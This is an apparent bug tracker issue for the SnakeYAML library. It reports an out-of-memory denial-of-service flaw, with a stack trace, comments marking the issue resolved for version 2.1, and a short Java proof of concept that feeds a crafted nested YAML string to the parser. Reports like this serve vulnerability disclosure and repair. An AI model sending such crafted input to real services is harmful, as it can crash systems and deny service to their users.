- changed status to open
OutOfMemoryError when parsing yaml data
Issue #1064
resolved
Description
Those using Snake-yaml to parse untrusted yaml data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack.
Error Log
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
at java.util.Arrays.copyOf(Arrays.java:3332)
at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:448)
at java.lang.StringBuilder.append(StringBuilder.java:142)
at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:93)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at java.util.AbstractCollection.toString(AbstractCollection.java:462)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at java.util.AbstractCollection.toString(AbstractCollection.java:462)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:82)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at java.util.AbstractCollection.toString(AbstractCollection.java:462)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at java.util.AbstractCollection.toString(AbstractCollection.java:462)
at java.lang.String.valueOf(String.java:2994)
at java.lang.StringBuilder.append(StringBuilder.java:137)
at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
PoC
// PoC.java
import org.yaml.snakeyaml.Yaml;
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
/**
* Poc
*
* @since 1.0.0
*/
public class Poc {
public static void test(String data) {
String datastring = data;
try (InputStream datastream = new ByteArrayInputStream(datastring.getBytes());
InputStreamReader reader = new InputStreamReader(datastream, "UTF-8");) {
Yaml yaml = new Yaml();
yaml.loadAs(reader, String.class);
} catch (Exception e) {
}
}
public static void main(String[] args) {
test(" ? - - ? - - ? ? - - ? ? ? - - ? ? - - ? ? ? - - ? ? - ? ? - - ? - - ? ? ? - - ? ? - ? -? - ? ? - - ? - - ? ? ? - - ? ? - ? -? - ? ? - - ? - ");
}
}
References
Comments (4)
-
-
- marked as minor
-
assigned issue to
-
Feel free to review
-
- changed status to resolved
It will be delivered in version 2.1
- Log in to comment